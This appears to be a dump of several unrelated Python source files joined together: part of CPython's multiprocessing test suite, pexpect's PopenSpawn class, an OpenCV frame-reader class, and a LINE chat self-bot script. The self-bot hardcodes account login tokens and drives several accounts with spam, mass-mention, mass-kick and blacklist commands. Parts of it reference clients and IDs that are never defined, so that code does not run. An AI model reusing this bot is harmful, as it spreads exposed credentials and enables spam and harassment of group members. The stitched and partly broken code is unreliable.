o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
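# Usage sketch: this module is not meant to be run directly.  A thin per-start-method
# wrapper imports it and materialises the test classes for one start method via
# install_tests_in_module_dict().  Assuming the module is importable as
# test._test_multiprocessing (as the TestFlags test above does), a minimal wrapper is:
#
#     import unittest
#     import test._test_multiprocessing
#
#     test._test_multiprocessing.install_tests_in_module_dict(globals(), 'spawn')
#
#     if __name__ == '__main__':
#         unittest.main()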
|
popen_spawn.py
|
"""Provides an interface like pexpect.spawn interface using subprocess.Popen
"""
import os
import threading
import subprocess
import sys
import time
import signal
import shlex
try:
from queue import Queue, Empty # Python 3
except ImportError:
from Queue import Queue, Empty # Python 2
from .spawnbase import SpawnBase, PY3
from .exceptions import EOF
from .utils import string_types
class PopenSpawn(SpawnBase):
if PY3:
crlf = '\n'.encode('ascii')
else:
crlf = '\n'
def __init__(self, cmd, timeout=30, maxread=2000, searchwindowsize=None,
logfile=None, cwd=None, env=None, encoding=None,
codec_errors='strict'):
super(PopenSpawn, self).__init__(timeout=timeout, maxread=maxread,
searchwindowsize=searchwindowsize, logfile=logfile,
encoding=encoding, codec_errors=codec_errors)
kwargs = dict(bufsize=0, stdin=subprocess.PIPE,
stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
cwd=cwd, env=env)
if sys.platform == 'win32':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
kwargs['startupinfo'] = startupinfo
kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
if isinstance(cmd, string_types) and sys.platform != 'win32':
cmd = shlex.split(cmd, posix=os.name == 'posix')
self.proc = subprocess.Popen(cmd, **kwargs)
self.pid = self.proc.pid
self.closed = False
self._buf = self.string_type()
self._read_queue = Queue()
self._read_thread = threading.Thread(target=self._read_incoming)
self._read_thread.setDaemon(True)
self._read_thread.start()
_read_reached_eof = False
def read_nonblocking(self, size, timeout):
buf = self._buf
if self._read_reached_eof:
# We have already finished reading. Use up any buffered data,
# then raise EOF
if buf:
self._buf = buf[size:]
return buf[:size]
else:
self.flag_eof = True
raise EOF('End Of File (EOF).')
if timeout == -1:
timeout = self.timeout
elif timeout is None:
timeout = 1e6
t0 = time.time()
while (time.time() - t0) < timeout and size and len(buf) < size:
try:
incoming = self._read_queue.get_nowait()
except Empty:
break
else:
if incoming is None:
self._read_reached_eof = True
break
buf += self._decoder.decode(incoming, final=False)
r, self._buf = buf[:size], buf[size:]
self._log(r, 'read')
return r
def _read_incoming(self):
"""Run in a thread to move output from a pipe to a queue."""
fileno = self.proc.stdout.fileno()
while 1:
buf = b''
try:
buf = os.read(fileno, 1024)
except OSError as e:
self._log(e, 'read')
if not buf:
# This indicates we have reached EOF
self._read_queue.put(None)
return
self._read_queue.put(buf)
def write(self, s):
'''This is similar to send() except that there is no return value.
'''
self.send(s)
def writelines(self, sequence):
'''This calls write() for each element in the sequence.
The sequence can be any iterable object producing strings, typically a
list of strings. This does not add line separators. There is no return
value.
'''
for s in sequence:
self.send(s)
def send(self, s):
'''Send data to the subprocess' stdin.
Returns the number of bytes written.
'''
s = self._coerce_send_string(s)
self._log(s, 'send')
b = self._encoder.encode(s, final=False)
if PY3:
return self.proc.stdin.write(b)
else:
# On Python 2, .write() returns None, so we return the length of
# bytes written ourselves. This assumes they all got written.
self.proc.stdin.write(b)
return len(b)
def sendline(self, s=''):
'''Wraps send(), sending string ``s`` to child process, with os.linesep
automatically appended. Returns number of bytes written. '''
n = self.send(s)
return n + self.send(self.linesep)
def wait(self):
'''Wait for the subprocess to finish.
Returns the exit code.
'''
status = self.proc.wait()
if status >= 0:
self.exitstatus = status
self.signalstatus = None
else:
self.exitstatus = None
self.signalstatus = -status
self.terminated = True
return status
def kill(self, sig):
'''Sends a Unix signal to the subprocess.
Use constants from the :mod:`signal` module to specify which signal.
'''
if sys.platform == 'win32':
if sig in [signal.SIGINT, signal.CTRL_C_EVENT]:
sig = signal.CTRL_C_EVENT
elif sig in [signal.SIGBREAK, signal.CTRL_BREAK_EVENT]:
sig = signal.CTRL_BREAK_EVENT
else:
sig = signal.SIGTERM
os.kill(self.proc.pid, sig)
def sendeof(self):
'''Closes the stdin pipe from the writing end.'''
self.proc.stdin.close()
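# Usage sketch (assumptions: SpawnBase supplies the pexpect-style expect() matching
# used below; the command and prompt are purely illustrative):
#
#     child = PopenSpawn('python -i', encoding='utf-8', timeout=10)
#     child.expect('>>> ')        # stderr is merged into stdout, so the prompt is readable
#     child.sendline('1 + 1')
#     child.expect('2')
#     child.sendeof()             # close stdin so the interpreter exits
#     child.wait()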
|
videoCapture.py
|
import cv2
import queue
import threading
class VideoCapture(object):
def __init__(self, video_stream):
self.cap = cv2.VideoCapture(video_stream)
self.q = queue.Queue()
self.video_stream = video_stream
self.t = threading.Thread(target=self._reader)
self.t.daemon = True
self.t.start()
def _reader(self):
while True:
ret, frame = self.cap.read()
if not ret:
self.cap.set(cv2.CAP_PROP_POS_FRAMES, 0)
continue
            if not self.q.empty():
                try:
                    # drop the stale frame so read() always returns the newest one
                    self.q.get_nowait()
                except queue.Empty:
                    pass
self.q.put(frame)
def read(self):
return self.q.get()
def isOpened(self):
return self.cap.isOpened()
def release(self):
return self.cap.release()
    def restart(self):
        # Note: assigning .killed does not actually stop the old reader thread; it
        # keeps running alongside the new one created by __init__() below.
        self.t.killed = True
        self.__init__(self.video_stream)
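# Usage sketch (assumption: any source accepted by cv2.VideoCapture -- a file path,
# camera index, or stream URL; the URL below is a placeholder):
#
#     cap = VideoCapture("rtsp://camera.local/stream")
#     while cap.isOpened():
#         frame = cap.read()      # blocks until a frame arrives; stale frames are dropped
#         cv2.imshow("preview", frame)
#         if cv2.waitKey(1) & 0xFF == ord('q'):
#             break
#     cap.release()
#     cv2.destroyAllWindows()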
|
Line-dul.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from LINETCR import server
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,requests,urllib
import re,string,os,shutil,urllib2,urllib3,subprocess
from urllib import urlopen
import requests,tempfile
#kk = LINETCR.LINE()
#kk.login(qr=True)
#kk.loginResult()
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token="EnliZjabbWniaqdsPTt5.nqZhqiZgZilGvU4eyth5jq.4DldEayovtSgtlpllfy/HiizJIJKmojjW1RC3eFY7RE=")
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token="EnkbSAUsfLrAeepJVS87.7aNdCEtbMUaAO9Hiv0qoTW.m260dnSrLLw2kC3NImxtk7zAMmMoMD+I78Nx/PNJjEs=")
ki.loginResult()
kk = LINETCR.LINE()
#kk.login(qr=True)
kk.login(token="EnyTpTVYCSl7Bk9Getxc.SJRuNecAXNC8sHurfor2ha.FvjQmaYhw1tQ7xg/BmYpNBh+d6/GM98WAGGHeBwJL24=")
kk.loginResult()
kc = LINETCR.LINE()
#kc.login(qr=True)
kc.login(token="EnqwhiNcEYLaYRH56U9d.6WqeC+1pukOllkvQ7Oglhq.zSdH/YLAkAXkOlHEOkvuQOIX0b11gNPLu1LAlEPw8Ik=")
kc.loginResult()
cl
print "login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""" - DULKOL BOT TEAM -
General command :
Me = Cek akun sendiri
My mid = Cek akun Mid
Mid @ = Cek mid via tag
Bot? = Cek akun Bot
Ginfo = Group info
Id Group = Melihat id grup
Group pict = Melihat pict grup
Speedbot = Cek kecepatan bot
Up = Fungsi spam chat
Tagall = Mention semua user
Cek = Membuat set point
Sider = Melihat sider dibawah read point
Apakah ... = Menanyakan jawaban ya atau tidak
Creator = Melihat kontak pembuat bot
private command :
Set group = Melihat private menu"""
Setgroup =""" Private Menu red check mark
[Protect Group]
-- Gr on/off
[Mid Via Contact]
-- Contact on/off
[Cancel All Invited]
-- Cancl on/off
[No Joinned]
-- Joinn on/off
red arrow right Command Private
[Set View] = Melihat proteksi bot
[Get ready] = Cek respon bot
[Gn namagroup] = Ganti nama grup
[Open url] = Membuka url grup
[Gurl] = Membuka dan mengirim url grup
[Close url] = Menutup url grup
[Cancel] = Cancel user masuk grup
[Staff add @] = Menambah user admin
[Staff remove @] = Menghapus user dari admin
[Stafflist] = Melihat daftar admin
[Ban @] = Ban target with mention
[Ban] = Ban target with send contact
[Unban @] = Unban target with mention
[Unban] = Unban target with send contact
[Banlist] = Melihat daftar akun ter-banned
[Kill @] = Kick target banned
[Nk @] = Kick target user
[List group] = Melihat daftar grup pada bot
[Group id] = Melihat daftar id grup pada bot
[Invite mid] = Invite via mid
[inv: (gid)] = Invite admin ke group id yang dituju
[Kick mid] = Kick via mid
[Ard Squad join] = Invite semua bot
[Bye bots] = Mengeluarkan semua bots assist
[Bye Ard] = Mengeluarkan bot utama
[Ard out] = Mengeluarkan bot utama dari semua grup
[Bc ...] = Untuk broadcast ke semua grup
[Kernel] = Melihat kernel bot"""
KAC=[cl,ki,kk,kc]
DEF=[ki,kk,kc]
mid = cl.getProfile().mid    # "u350cc7408cc6cc82e056ee046131f925"
Amid = ki.getProfile().mid   # "uec09c371e4c19ae01aa3d84857440eb7"
Bmid = kk.getProfile().mid   # "ub23ad49c409ac6773c4a151114e4761c"
Cmid = kc.getProfile().mid   # "ueb040473fd4f50aa0b2ca56aee818b1d"
Bots=[mid,Amid,Bmid,Cmid,"u350cc7408cc6cc82e056ee046131f925"]
admin=["u350cc7408cc6cc82e056ee046131f925"]
admsa=["u350cc7408cc6cc82e056ee046131f925"]
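# `wait` holds the per-feature switches toggled from chat (see Setgroup above):
# "Protectgr"/"Protectjoin"/"Protectcancl" appear to back the Gr/Joinn/Cancl on/off
# commands, "blacklist" is the kick/ban list, and "lang" selects which reply text is sent.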
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'message':"Thanks for add me",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"✴✴(iɥpɐƃuɐqɐq)",
"cName":"bots",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"Protectjoin":False,
"Protectcancl":False,
"protectionOn":True,
"atjointicket":True,
}
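# `wait2` backs the read-receipt ("Cek"/"Sider") feature: 'readPoint' marks groups
# where a check point has been set, 'readMember' accumulates reader display names,
# and 'ROM' maps group id -> {reader mid: display name} (see NOTIFIED_READ_MESSAGE).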
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
setTime = {}
setTime = wait2['setTime']
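# Note: sendMessage() below references `profile` and `messageReq`, neither of which
# is defined in this script, and it never actually dispatches anything; the handlers
# further down call cl.sendText()/cl.sendMessage() directly instead.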
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "\n・" + Name
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
                if msg.to in wait2['readPoint']:
                    if msg.from_ in wait2["ROM"][msg.to]:
                        del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 32:
if wait["Protectgr"] == True:
if op.param2 not in Bots + admin:
                    ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
ki.kickoutFromGroup(op.param1,[op.param2])
else:
pass
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if ki.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
ki.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
print "Url Opened, Autokick on"
else:
print "random group update"
else:
pass
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
#------Cancel Invite User Finish------#
if op.type == 13:
if wait["Protectcancl"] == True:
try:
X = ki.getGroup(op.param1)
gInviMids = [contact.mid for contact in X.invitee]
ki.cancelGroupInvitation(op.param1, gInviMids)
                    print str(gInviMids) + " invite canceled"
except:
try:
print "Retry canceling invitation"
X = ki.getGroup(op.param1)
gInviMids = [contact.mid for contact in X.invitee]
ki.cancelGroupInvitation(op.param1, gInviMids)
                        print str(gInviMids) + " invite canceled"
except:
print "Bot can't cancel the invitation"
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
print "BOT 1 Joined"
else:
print "autoJoin is Off"
else:
pass
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
                    # ki owns the invite (op.param2 is Amid), so it opens the ticket for cl to join
                    G = ki.getGroup(op.param1)
                    G.preventJoinByTicket = False
                    ki.updateGroup(G)
                    Ticket = ki.reissueGroupTicket(op.param1)
                    cl.acceptGroupInvitationByTicket(op.param1,Ticket)
                    G.preventJoinByTicket = True
                    ki.updateGroup(G)
                    Ticket = ki.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
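            # The branches below reference bot clients (ks, ka, kb, ko, ke, ku) and mids
            # (Dmid ... Imid) that are never defined in this script, so evaluating them
            # raises NameError and the invite chain effectively ends with kc above.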
if op.param3 in Dmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
ka.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ka.updateGroup(X)
Ti = ka.reissueGroupTicket(op.param1)
if op.param3 in Fmid:
if op.param2 in Emid:
X = ka.getGroup(op.param1)
X.preventJoinByTicket = False
ka.updateGroup(X)
Ti = ka.reissueGroupTicket(op.param1)
kb.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kb.updateGroup(X)
Ti = kb.reissueGroupTicket(op.param1)
if op.param3 in Gmid:
if op.param2 in Fmid:
X = kb.getGroup(op.param1)
X.preventJoinByTicket = False
kb.updateGroup(X)
Ti = kb.reissueGroupTicket(op.param1)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ko.updateGroup(X)
Ti = ko.reissueGroupTicket(op.param1)
if op.param3 in Hmid:
if op.param2 in Gmid:
X = ko.getGroup(op.param1)
X.preventJoinByTicket = False
ko.updateGroup(X)
Ti = ko.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
if op.param3 in Imid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ku.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.type == 15:
group = cl.getGroup(op.param1)
cb = Message()
cb.to = op.param1
cb.text = "Good bye " + cl.getContact(op.param2).displayName
cl.sendMessage(cb)
            print op.param2 + " has left the group"
#------Joined User Kick start------#
if op.type == 17:
if op.param2 in wait["blacklist"]:
try:
ki.kickoutFromGroup(op.param1, op.param2)
except:
random.choice(KAC).kickoutFromGroup(op.param1, op.param2)
if op.type == 17:
if wait["Protectjoin"] == True:
if op.param2 not in Bots:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
#------Joined User Kick start------#
if op.type == 17:
group = cl.getGroup(op.param1)
cb = Message()
cb.to = op.param1
cb.text = "Hi " + cl.getContact(op.param2).displayName + ", welcome to " + group.name
cl.sendMessage(cb)
if op.type == 19:
print "someone was kicked"
if op.param3 in admin:
print "Admin has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admsa:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
try:
cl.inviteIntoGroup(op.param1,admin)
except:
cl.inviteIntoGroup(op.param1,admin)
print "Admin invited back"
if mid in op.param3:
print "BOT1 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
ki.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
print "BOT1 Joined"
if Amid in op.param3:
print "BOT2 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
print "BOT2 Joined"
if Bmid in op.param3:
print "BOT3 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
print "BOT3 Joined"
if Cmid in op.param3:
print "BOT4 has been kicked"
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "kicker kicked"
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
print "BOT4 Joined"
else:
if wait["Protectgr"] == True:
if op.param2 in Bots + admin:
pass
else:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
print "autokick executed"
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "u350cc7408cc6cc82e056ee046131f925":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
                url = "line://home/post?userMid=" + mid + "&postId=" + "new_post"
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"Already in blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Decided not to comment.")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Removed from blacklist.")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"There's no target in blacklist.")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Already in blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Added to blacklist.")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Removed from blacklist.")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"There's no target in blacklist.")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
